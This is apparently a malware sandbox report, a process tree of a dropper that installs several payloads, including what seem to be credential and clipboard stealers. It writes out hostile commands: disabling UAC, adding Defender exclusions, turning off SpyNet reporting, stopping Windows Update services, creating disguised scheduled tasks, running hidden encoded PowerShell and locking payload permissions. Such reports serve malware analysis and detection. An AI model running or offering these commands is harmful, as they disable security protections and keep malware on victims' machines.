wrote to memory of 3120 4784 YfjcaqMeZJkgV91IIez0oMRl.tmp 91 PID 4784 wrote to memory of 3120 4784 YfjcaqMeZJkgV91IIez0oMRl.tmp 91 PID 2056 wrote to memory of 2080 2056 nhdues.exe 90 PID 2056 wrote to memory of 2080 2056 nhdues.exe 90 PID 2056 wrote to memory of 2080 2056 nhdues.exe 90 PID 2056 wrote to memory of 4448 2056 nhdues.exe 92 PID 2056 wrote to memory of 4448 2056 nhdues.exe 92 PID 2056 wrote to memory of 4448 2056 nhdues.exe 92 PID 4448 wrote to memory of 3140 4448 cmd.exe 96 PID 4448 wrote to memory of 3140 4448 cmd.exe 96 PID 4448 wrote to memory of 3140 4448 cmd.exe 96 PID 3988 wrote to memory of 4552 3988 InstallUtil.exe 99 PID 3988 wrote to memory of 4552 3988 InstallUtil.exe 99 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 28e6b17dbc94ab578deb129913c5d938f1b4ef81ba9484009efa13be60c957a5.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3204
-
C:\Users\Admin\AppData\Local\Temp\28e6b17dbc94ab578deb129913c5d938f1b4ef81ba9484009efa13be60c957a5.exe"C:\Users\Admin\AppData\Local\Temp\28e6b17dbc94ab578deb129913c5d938f1b4ef81ba9484009efa13be60c957a5.exe"2⤵
- UAC bypass
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\28e6b17dbc94ab578deb129913c5d938f1b4ef81ba9484009efa13be60c957a5.exe" -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4604
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"3⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3988 -
C:\Users\Admin\Pictures\x2sfuoqahzZ1uPAD6UOCLQ4o.exe"C:\Users\Admin\Pictures\x2sfuoqahzZ1uPAD6UOCLQ4o.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:5016
-
-
C:\Users\Admin\Pictures\Zs9u34rtGt6YlFISWM1itCcN.exe"C:\Users\Admin\Pictures\Zs9u34rtGt6YlFISWM1itCcN.exe"4⤵
- Executes dropped EXE
PID:4064 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2188
-
-
C:\Users\Admin\Pictures\Zs9u34rtGt6YlFISWM1itCcN.exe"C:\Users\Admin\Pictures\Zs9u34rtGt6YlFISWM1itCcN.exe"5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2236 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:4108
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:3792
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
PID:904
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:5012
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:1832
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe6⤵PID:2200
-
-
-
-
C:\Users\Admin\Pictures\rn6enq3Sejn0cjFjHZJ0n2A9.exe"C:\Users\Admin\Pictures\rn6enq3Sejn0cjFjHZJ0n2A9.exe"4⤵
- Executes dropped EXE
PID:5012 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3120
-
-
C:\Users\Admin\Pictures\rn6enq3Sejn0cjFjHZJ0n2A9.exe"C:\Users\Admin\Pictures\rn6enq3Sejn0cjFjHZJ0n2A9.exe"5⤵
- Executes dropped EXE
PID:2888 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:4288
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:96
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
PID:2692
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:5044
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:4228
-
-
-
-
C:\Users\Admin\Pictures\vtAyuNR3sRk30cmQP0sp8c0d.exe"C:\Users\Admin\Pictures\vtAyuNR3sRk30cmQP0sp8c0d.exe" --silent --allusers=04⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Users\Admin\Pictures\vtAyuNR3sRk30cmQP0sp8c0d.exeC:\Users\Admin\Pictures\vtAyuNR3sRk30cmQP0sp8c0d.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.26 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6f258538,0x6f258548,0x6f2585545⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2932
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\vtAyuNR3sRk30cmQP0sp8c0d.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\vtAyuNR3sRk30cmQP0sp8c0d.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4156
-
-
C:\Users\Admin\Pictures\vtAyuNR3sRk30cmQP0sp8c0d.exe"C:\Users\Admin\Pictures\vtAyuNR3sRk30cmQP0sp8c0d.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3200 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231013040904" --session-guid=d15a71dc-a68c-4d63-b3ce-946195cc0121 --server-tracking-blob=M2VjYTEzNThhMWUyZDc0YTkwZjI1ZmZhZGRjMjAzZmFmMzAxM2NkNmU4NjVlMzk5MTMyN2ZjZmEwYjk2ZmUzMzp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5NzE3MDE1MC4yNzcxIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJmMDViZDQwYS1lMmE2LTQ0MDktYjcyZi00YmRmZDhjM2Y5ZDgifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=A4040000000000005⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Users\Admin\Pictures\vtAyuNR3sRk30cmQP0sp8c0d.exeC:\Users\Admin\Pictures\vtAyuNR3sRk30cmQP0sp8c0d.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.26 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x6d728538,0x6d728548,0x6d7285546⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4760
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310130409041\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310130409041\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"5⤵
- Executes dropped EXE
PID:1296
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310130409041\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310130409041\assistant\assistant_installer.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3416 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310130409041\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310130409041\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.25 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0xc41588,0xc41598,0xc415a46⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4152
-
-
-
-
C:\Users\Admin\Pictures\f0qRnAgqtZ9YKQTPPgHfpqoG.exe"C:\Users\Admin\Pictures\f0qRnAgqtZ9YKQTPPgHfpqoG.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3616 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\f0qRnAgqtZ9YKQTPPgHfpqoG.exe" & exit5⤵PID:4564
-
C:\Windows\SysWOW64\timeout.exetimeout /t 66⤵
- Delays execution with timeout.exe
PID:5084
-
-
-
-
C:\Users\Admin\Pictures\VeEnOaBeAblogsTl0jqBJENx.exe"C:\Users\Admin\Pictures\VeEnOaBeAblogsTl0jqBJENx.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4068
-
-
C:\Users\Admin\Pictures\YfjcaqMeZJkgV91IIez0oMRl.exe"C:\Users\Admin\Pictures\YfjcaqMeZJkgV91IIez0oMRl.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=53334⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4508
-
-
C:\Users\Admin\Pictures\85dF8Pvye4bZ18FyCDaP1jhH.exe"C:\Users\Admin\Pictures\85dF8Pvye4bZ18FyCDaP1jhH.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3824 -
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F6⤵
- Creates scheduled task(s)
PID:2080
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit6⤵
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:3140
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "nhdues.exe" /P "Admin:N"7⤵PID:3136
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "nhdues.exe" /P "Admin:R" /E7⤵PID:4136
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\1ff8bec27e" /P "Admin:R" /E7⤵PID:3980
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\1ff8bec27e" /P "Admin:N"7⤵PID:2712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:600
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main6⤵
- Loads dropped DLL
PID:2020 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main7⤵
- Loads dropped DLL
PID:3000
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main6⤵
- Loads dropped DLL
PID:1228
-
-
-
-
C:\Users\Admin\Pictures\vYtHCNIgfkioilWqZ4Zxypi9.exe"C:\Users\Admin\Pictures\vYtHCNIgfkioilWqZ4Zxypi9.exe"4⤵
- Executes dropped EXE
PID:4552 -
C:\Users\Admin\AppData\Local\Temp\7zSD443.tmp\Install.exe.\Install.exe5⤵
- Executes dropped EXE
PID:2208 -
C:\Users\Admin\AppData\Local\Temp\7zSE124.tmp\Install.exe.\Install.exe /FdidbR "385118" /S6⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:872 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵PID:432
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&8⤵PID:5020
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:329⤵PID:4256
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:649⤵PID:2148
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵PID:4944
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵PID:2784
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:329⤵PID:3544
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:649⤵PID:4872
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "goxPAZkuI" /SC once /ST 01:38:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- Creates scheduled task(s)
PID:4996
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "goxPAZkuI"7⤵PID:4940
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "goxPAZkuI"7⤵PID:3392
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbjfBeKuXNIWLGjFwD" /SC once /ST 04:11:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\MOgSoEJifpbrwsMhP\XaWciVoITrkAOBZ\QkjKqSF.exe\" KF /XUsite_idxyO 385118 /S" /V1 /F7⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4504
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4980
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:656
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1920
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3256
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4532
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3552
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"2⤵PID:3160
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:4144
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\iacrcjwhmdyc.xml"2⤵
- Creates scheduled task(s)
PID:4748
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:4452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4476
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:4276
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3256
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2152
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4972
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3068
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1384
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:5044
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3572
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2504
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:3408
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1332
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\iacrcjwhmdyc.xml"2⤵
- Creates scheduled task(s)
PID:5000
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:1016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:436
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\hfquevqyxqbr.xml"2⤵
- Creates scheduled task(s)
PID:2660
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:3716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:220
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:5092
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\hfquevqyxqbr.xml"2⤵
- Creates scheduled task(s)
PID:3184
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Modifies data under HKEY_USERS
PID:3688
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:3732
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3160
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:520
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1028
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4944
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4628
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:2808
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:2348
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:2616
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:3868
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:2692
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\iacrcjwhmdyc.xml"2⤵
- Creates scheduled task(s)
PID:4256
-
-
C:\Users\Admin\AppData\Local\Temp\is-22BH3.tmp\YfjcaqMeZJkgV91IIez0oMRl.tmp"C:\Users\Admin\AppData\Local\Temp\is-22BH3.tmp\YfjcaqMeZJkgV91IIez0oMRl.tmp" /SL5="$70202,5025136,832512,C:\Users\Admin\Pictures\YfjcaqMeZJkgV91IIez0oMRl.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=53331⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Users\Admin\AppData\Local\Temp\is-BLTFL.tmp\_isetup\_setup64.tmphelper 105 0x3B42⤵
- Executes dropped EXE
PID:3120
-
-
C:\Windows\system32\schtasks.exe"schtasks" /Query /TN "DigitalPulseUpdateTask"2⤵PID:1452
-
-
C:\Windows\system32\schtasks.exe"schtasks" /Create /TN "DigitalPulseUpdateTask" /SC HOURLY /TR "C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseUpdate.exe"2⤵
- Creates scheduled task(s)
PID:5088
-
-
C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe"C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe" 5333:::clickId=:::srcId=2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4420
-
-
C:\Windows\System32\sc.exesc stop dosvc1⤵
- Launches sc.exe
PID:3732
-
C:\Windows\System32\sc.exesc stop bits1⤵
- Launches sc.exe
PID:780
-
C:\Windows\System32\sc.exesc stop wuauserv1⤵
- Launches sc.exe
PID:3472
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc1⤵
- Launches sc.exe
PID:4156
-
C:\Windows\System32\sc.exesc stop UsoSvc1⤵
- Launches sc.exe
PID:2076
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2084
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3180 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1336
-
-
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exeC:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe1⤵
